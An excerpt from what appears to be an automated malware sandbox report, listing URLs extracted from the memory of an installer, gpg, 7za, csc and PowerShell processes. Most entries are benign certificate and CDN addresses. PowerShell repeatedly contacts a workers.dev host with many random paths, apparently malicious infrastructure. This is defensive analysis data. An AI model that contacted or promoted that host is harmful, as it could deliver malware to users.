Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.debug.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.jsT
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB50F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn-app-web2.lenete5970.workers.dev
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: svchost.exe, 00000020.00000002.2851500549.0000021ACEA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
Source: VirtManage.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E17F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911793607.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000003.00000002.917102011.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000005.00000002.922912388.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000A.00000002.978937758.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000011.00000002.1006362463.00000000630A7000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E17F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1249222551.0000016E302D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E19F1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E19EF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.org
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.orgGnuPGgpggpgsmgpg-agentgpgtarEMAILGNUPGGPGGPGSMGPG_AGENTSCDAEMONTPM2DAEMONDIRMN
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lene
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete597
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.wor
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB50AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev
Source: 7za.exe, 00000013.00000003.1009751136.000001AC45C50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3414029874.0000021BCC9B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC4A6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1269985096.000001F1C7B42000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275327848.000001F1C7AAD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274470395.000001F1C933B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1275000997.000001F1C7AAB000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274936275.000001F1C7AA3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1269856750.000001F1C7B54000.00000004.00000020.00020000.00000000.sdmp, b0okydtw.dll.33.dr, kautix2aeX.t.19.drString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//0XjWtOAJc12/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//0eXf3L/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//12A3T/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//3Q8RvcU7mN30Sif/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//3U/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//4Yla1mHPUsRdGy2/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//4sNZYuSV4D/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//5/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//5EmUcsac425lh03/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//5YPvjPS4kbB/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//5eH/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//6ba4yECizZXxWZj/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//7GYendoNf/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//8/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//8c68oclZ/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB50AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//A3C3Spv34bE/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB50AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//A3C3Spv34bE/X
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB50AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//A3C3Spv34bE/p
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//A5TZesr5AZQmw2R/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//BEWA/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//C3uMfGtULa/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//CIGLCiMAs/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//GXjIH/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//I3kLy/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//I8A/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//IG1a/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//IsPWDc7ereKi/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//JcmuPKPr5iV/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//Jflu7Uc/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//KKIQUQZnx/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//M42XAQJwqeK/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB50F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//M42XAQJwqeK/CJ4/urred
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//NAQwfU/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//Nr2Nj4/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB517A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//O/
